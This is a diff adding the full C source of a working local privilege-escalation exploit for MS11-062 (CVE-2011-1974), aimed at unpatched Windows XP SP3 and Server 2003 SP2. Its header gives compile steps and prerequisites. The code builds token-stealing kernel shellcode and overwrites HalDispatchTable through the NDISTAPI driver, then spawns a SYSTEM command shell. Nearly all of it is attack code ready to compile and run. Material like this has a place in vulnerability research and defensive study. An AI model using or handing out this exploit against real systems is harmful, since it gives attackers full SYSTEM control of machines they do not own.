+#   Exploit compiling (Kali GNU/Linux Rolling 64-bit):
+#     - # i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32
+#   Exploit prerequisites:
+#     - low privilege access to the target OS
+#     - target OS not patched (KB2566454)
+#     - Remote Access Service (RAS) running
+#       - sc query remoteaccess
+#       - sc start remoteaccess
+################################################################
+# Patches:
+#   Windows XP SP3 x86
+#     WindowsXP-KB2566454-x86-enu.exe
+#       (not available - EoL)
+#   Windows Server 2003 SP2 x86
+#     WindowsServer2003-KB2566454-x86-enu.exe
+#       https://www.microsoft.com/en-us/download/details.aspx?id=27093
+################################################################
+# Thanks to:
+#   Ni Tao (writeup)
+#   Google Translate (Chinese -> Engrish)
+################################################################
+# References:
+#   https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1974
+#   https://technet.microsoft.com/en-us/library/security/ms11-062.aspx
+#   http://www.cas.stc.sh.cn/jsjyup/pdf/2015/5/%E5%9F%BA%E4%BA%8E%E9%9D%99%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%AE%89%E5%85%A8%E6%80%A7%E6%A3%80%E6%B5%8B.pdf
+#   https://translate.google.com/
+################################################################
+*/
+
+
+#include <winsock2.h>
+#include <windows.h>
+#include <stdio.h>
+#include <ws2tcpip.h>
+
+#pragma comment (lib, "ws2_32.lib")
+
+
+////////////////////////////////////////////////////////////////
+// DEFINE DATA TYPES
+////////////////////////////////////////////////////////////////
+
+typedef enum _KPROFILE_SOURCE {
+    ProfileTime,
+    ProfileAlignmentFixup,
+    ProfileTotalIssues,
+    ProfilePipelineDry,
+    ProfileLoadInstructions,
+    ProfilePipelineFrozen,
+    ProfileBranchInstructions,
+    ProfileTotalNonissues,
+    ProfileDcacheMisses,
+    ProfileIcacheMisses,
+    ProfileCacheMisses,
+    ProfileBranchMispredictions,
+    ProfileStoreInstructions,
+    ProfileFpInstructions,
+    ProfileIntegerInstructions,
+    Profile2Issue,
+    Profile3Issue,
+    Profile4Issue,
+    ProfileSpecialInstructions,
+    ProfileTotalCycles,
+    ProfileIcacheIssues,
+    ProfileDcacheAccesses,
+    ProfileMemoryBarrierCycles,
+    ProfileLoadLinkedIssues,
+    ProfileMaximum
+} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
+
+
+typedef DWORD (WINAPI *PNTQUERYINTERVAL) (
+    KPROFILE_SOURCE   ProfileSource,
+    PULONG            Interval
+);
+
+
+typedef LONG NTSTATUS;
+
+
+typedef NTSTATUS (WINAPI *PNTALLOCATE) (
+    HANDLE            ProcessHandle,
+    PVOID             *BaseAddress,
+    ULONG             ZeroBits,
+    PULONG            RegionSize,
+    ULONG             AllocationType,
+    ULONG             Protect
+);
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+    ULONG             Reserved[2];
+    PVOID             Base;
+    ULONG             Size;
+    ULONG             Flags;
+    USHORT            Index;
+    USHORT            Unknown;
+    USHORT            LoadCount;
+    USHORT            ModuleNameOffset;
+    CHAR              ImageName[256];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+
+typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
+
+
+////////////////////////////////////////////////////////////////
+// FUNCTIONS
+////////////////////////////////////////////////////////////////
+
+BOOL IsWow64()
+{
+    BOOL bIsWow64 = FALSE;
+    LPFN_ISWOW64PROCESS fnIsWow64Process;
+
+    fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process");
+
+    if(NULL != fnIsWow64Process)
+    {
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
+        if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
+        {
+            // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+            printf("   [-] Failed (error code: %d)\n", GetLastError());
+            return -1;
+        }
+    }
+    return bIsWow64;
+}
+
+
+////////////////////////////////////////////////////////////////
+// MAIN FUNCTION
+////////////////////////////////////////////////////////////////
+
+int main(void)
+{
+    printf("[*] MS11-062 (CVE-2011-1974) x86 exploit\n");
+    printf("   [*] by Tomislav Paskalev\n");
+
+
+    ////////////////////////////////////////////////////////////////
+    // IDENTIFY TARGET OS ARCHITECTURE AND VERSION
+    ////////////////////////////////////////////////////////////////
+
+    printf("[*] Identifying OS\n");
+
+
+    // identify target machine's OS architecture
+    // in case the target machine is running a 64-bit OS
+    if(IsWow64())
+    {
+        printf("   [-] 64-bit\n");
+        return -1;
+    }
+
+    printf("   [+] 32-bit\n");
+
+
+    // identify target machine's OS version
+    // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
+    // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
+    // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
+    OSVERSIONINFOEX osvi;
+    ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
+    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
+    GetVersionEx((LPOSVERSIONINFO) &osvi);
+
+    // define operating system version specific variables
+    unsigned char shellcode_KPROCESS;
+    unsigned char shellcode_TOKEN;
+    unsigned char shellcode_UPID;
+    unsigned char shellcode_APLINKS;
+    const char **securityPatchesPtr;
+    int securityPatchesCount;
+
+    ////////////////////////////////////////////////////////////////
+    /*
+    OS VERSION SPECIFIC OFFSETS
+
+    references:
+      http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm
+      http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm
+      http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm
+      http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/
+    */
+    ////////////////////////////////////////////////////////////////
+
+    // in case the OS version is 5.1, service pack 3
+    if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3))
+    {
+        // the target machine's OS is Windows XP SP3
+        printf("   [+] Windows XP SP3\n");
+        shellcode_KPROCESS = '\x44';
+        shellcode_TOKEN    = '\xC8';
+        shellcode_UPID     = '\x84';
+        shellcode_APLINKS  = '\x88';
+        const char *securityPatches[] = {"KB2566454"};
+        securityPatchesPtr = securityPatches;
+        securityPatchesCount = 1;
+    }
+
+    // in case the OS version is 5.2, service pack 2, not R2
+    //   https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx
+    else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0))
+    {
+        // the target machine's OS is Windows Server 2003 SP2
+        printf("   [+] Windows Server 2003 SP2\n");
+        shellcode_KPROCESS = '\x38';
+        shellcode_TOKEN    = '\xD8';
+        shellcode_UPID     = '\x94';
+        shellcode_APLINKS  = '\x98';
+        const char *securityPatches[] = {"KB2566454"};
+        securityPatchesPtr = securityPatches;
+        securityPatchesCount = 1;
+    }
+
+    // in case the OS version is not any of the previously checked versions
+    else
+    {
+        // the target machine's OS is an unsupported 32-bit Windows version
+        printf("   [-] Unsupported version\n");
+        printf("      [*] Affected 32-bit operating systems\n");
+        printf("         [*] Windows XP SP3\n");
+        printf("         [*] Windows Server 2003 SP2\n");
+        return -1;
+    }
+
+
+    ////////////////////////////////////////////////////////////////
+    // LOCATE REQUIRED OS COMPONENTS
+    ////////////////////////////////////////////////////////////////
+
+    printf("[*] Locating required OS components\n");
+
+
+    // retrieve system information
+    //   https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx
+    // locate "ZwQuerySystemInformation" in the "ntdll.dll" module
+    //   https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
+    FARPROC ZwQuerySystemInformation;
+    ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
+
+    // 11 = SystemModuleInformation
+    //   http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm
+    ULONG systemInformation;
+    ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation);
+
+    // allocate memory for the list of loaded modules
+    ULONG *systemInformationBuffer;
+    systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer));
+
+    if(!systemInformationBuffer)
+    {
+        printf("   [-] Could not allocate memory");
+        return -1;
+    }
+
+
+    // retrieve the list of loaded modules 
+    ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL);
+
+    // locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules
+    ULONG i;
+    PVOID targetKrnlMdlBaseAddr;
+    HMODULE targetKrnlMdlUsrSpcOffs;
+    BOOL foundModule = FALSE;
+    PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr;
+    loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1);
+
+    for(i = 0; i < *systemInformationBuffer; i++)
+    {
+        if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe"))
+        {
+            printf("   [+] ntkrnlpa.exe\n");
+            targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
+            targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
+            foundModule = TRUE;
+            break;
+        }    
+        else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe"))
+        {
+            printf("   [+] ntoskrnl.exe\n");
+            targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1);
+            targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
+            foundModule = TRUE;
+            break;
+        }     
+    }
+
+    // base address of the loaded module (kernel space)
+    printf("      [*] Address:      %#010x\n", targetKrnlMdlBaseAddr);
+
+    // offset address (relative to the parent process) of the loaded module (user space)
+    printf("      [*] Offset:       %#010x\n", targetKrnlMdlUsrSpcOffs);
+
+    if(!foundModule)
+    {
+        printf("   [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n");
+        return -1;
+    }
+
+    // free allocated buffer space
+    free(systemInformationBuffer);
+
+
+    // determine the address of the "HalDispatchTable" process (kernel space)
+    // locate the offset fo the "HalDispatchTable" process within the target module (user space)
+    ULONG_PTR HalDispatchTableUsrSpcOffs;
+    HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
+
+    if(!HalDispatchTableUsrSpcOffs)
+    {
+        printf("      [-] Could not find HalDispatchTable\n");
+        return -1;
+    }
+
+    printf("      [+] HalDispatchTable\n");
+    printf("         [*] Offset:    %#010x\n", HalDispatchTableUsrSpcOffs);
+
+    // calculate the address of "HalDispatchTable" in kernel space
+    // 1. identify the base address of the target module in kernel space
+    // 2. previous step's result [minus] the load address of the same module in user space
+    // 3. previous step's result [plus] the address of "HalDispatchTable" in user space
+    // EQUIVALENT TO:
+    // 1. determine RVA of HalDispatchTable
+    // *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
+    // 2. previous step's result [plus] base address of target module in kernel space
+    ULONG_PTR HalDispatchTableKrnlSpcAddr;
+    HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
+    HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
+
+
+    // locate "NtQueryIntervalProfile" in the "ntdll.dll" module
+    PNTQUERYINTERVAL NtQueryIntervalProfile;
+    NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+
+    if(!NtQueryIntervalProfile)
+    {
+        printf("   [-] Could not find NtQueryIntervalProfile\n");
+        return -1;
+    }
+
+    printf("   [+] NtQueryIntervalProfile\n");
+    printf("      [*] Address:      %#010x\n", NtQueryIntervalProfile);
+
+
+    ////////////////////////////////////////////////////////////////
+    // CREATE TOKEN STEALING SHELLCODE
+    ////////////////////////////////////////////////////////////////
+
+    printf("[*] Creating token stealing shellcode\n");
+
+
+    // construct the token stealing shellcode
+    unsigned char shellcode[] =
+    {
+        0x52,                                                        // PUSH EDX                     Save EDX on the stack (save context)
+        0x53,	                                                     // PUSH EBX                     Save EBX on the stack (save context)
+        0x33,0xC0,                                                   // XOR EAX, EAX                 Zero out EAX (EAX = 0)
+        0x64,0x8B,0x80,0x24,0x01,0x00,0x00,                          // MOV EAX, FS:[EAX+0x124]      Retrieve current _KTHREAD structure
+        0x8B,0x40,shellcode_KPROCESS,                                // MOV EAX, [EAX+_KPROCESS]     Retrieve _EPROCESS structure
+        0x8B,0xC8,                                                   // MOV ECX, EAX                 Copy EAX (_EPROCESS) to ECX
+        0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00,                    // MOV EBX, [EAX+_TOKEN]        Retrieve current _TOKEN
+        0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00,                  // MOV EAX, [EAX+_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+        0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00,                  // SUB EAX, _APLINKS         |  Retrieve EPROCESS from ActiveProcessLinks
+        0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4      |  Compare UniqueProcessId with 4 (System Process)
+        0x75,0xE8,                                                   // JNZ/JNE                ----  Jump if not zero/not equal
+        0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00,                    // MOV EDX, [EAX+_TOKEN]        Copy SYSTEM _TOKEN to EDX
+        0x8B,0xC1,                                                   // MOV EAX, ECX                 Copy ECX (current process _TOKEN) to EAX
+        0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00,                    // MOV [EAX+_TOKEN], EDX        Copy SYSTEM _TOKEN to current process _TOKEN
+        0x5B,                                                        // POP EBX                      Pop current stack value to EBX (restore context)
+        0x5A,                                                        // POP EDX                      Pop current stack value to EDX (restore context)
+        0xC2,0x08                                                    // RET 8                        Return
+    };
+
+    printf("   [*] Shellcode assembled\n");
+
+
+    // allocate memory (RWE permissions) for the shellcode
+    printf("   [*] Allocating memory\n");
+    LPVOID shellcodeAddress;
+    shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+    if(shellcodeAddress == NULL)
+    {
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+        printf("      [-] Failed (error code: %d)\n", GetLastError());
+        return -1;
+    }
+
+    printf("      [+] Address:      %#010x\n", shellcodeAddress);
+
+
+    // copy the shellcode to the allocated memory
+    memcpy((shellcodeAddress), shellcode, sizeof(shellcode));
+    printf("      [*] Shellcode copied\n");
+
+
+    ////////////////////////////////////////////////////////////////
+    // EXPLOIT THE VULNERABILITY
+    ////////////////////////////////////////////////////////////////
+
+    printf("[*] Exploiting vulnerability\n");
+
+
+    // open the vulnerable device driver
+    HANDLE targetDeviceHandle;
+    ULONG dwReturnSize;
+    int errorCode = 0;
+
+    printf("   [*] Opening NDISTAPI device driver\n");
+    // https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
+    targetDeviceHandle = CreateFile("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
+
+    // in case the function fails
+    if(targetDeviceHandle == INVALID_HANDLE_VALUE)
+    {
+        // the device driver was not opened successfully
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
+        errorCode = GetLastError();
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+        // in case of ERROR_FILE_NOT_FOUND
+        if(errorCode == 2)
+        {
+            // the vulnerable service is not running
+            printf("      [!] Remote Access Service not started\n");
+            printf("         [*] run \"sc start remoteaccess\"\n");
+            return -1;
+        }
+        // in case of any other error message
+        else
+        {
+            printf("      [-] Failed (error code: %d)\n", errorCode);
+            return -1;
+        }
+    }
+    // in case the function succeeds
+    else
+    {
+        // the device driver was opened succesfully
+        printf("      [+] Done\n");
+    }
+
+
+    // copy the shellcode address to the input buffer
+    unsigned char InputBuffer[8]={0};
+    memcpy((InputBuffer + 4), &shellcodeAddress, sizeof(shellcodeAddress));
+
+
+    // trigger vulnerability (cause arbitrary memory overwrite)
+    printf("   [*] Calling vulnerable function\n");
+    if(DeviceIoControl(
+        targetDeviceHandle,
+        0x8fff23d4,                                // DoLineCreateWork
+        (PVOID) InputBuffer, sizeof(InputBuffer),
+        (PVOID) (HalDispatchTableKrnlSpcAddr), 0,
+        &dwReturnSize, NULL
+        ) == 0)
+    {
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
+        errorCode = GetLastError();
+        // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+        // in case of ERROR_INSUFFICIENT_BUFFER
+        if(errorCode == 122)
+        {
+            // target is patched
+            printf("      [!] Target patched\n");
+            printf("         [*] Possible security patches\n");
+            for(i = 0; i < securityPatchesCount; i++)
+                printf("            [*] %s\n", securityPatchesPtr[i]);
+            return -1;
+        }
+        // in case of any other error message
+        else
+        {
+            // print the error code
+            printf("      [-] Failed (error code: %d)\n", errorCode);
+            return -1;
+        }
+    }
+    else
+        printf("      [+] Done\n");
+
+
+    // elevate privileges of the current process
+    printf("      [*] Elevating privileges to SYSTEM\n");
+    ULONG outInterval = 0;
+    // https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
+    NtQueryIntervalProfile(2, &outInterval);
+    printf("         [+] Done\n");
+
+
+    // spawn shell (with elevated privileges)
+    printf("         [*] Spawning shell\n");
+    // spawn SYSTEM shell within the current shell (remote shell friendly)
+    system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
+
+    // exit
+    printf("\n[*] Exiting SYSTEM shell\n");
+    return 1;
+}
+
+// EoF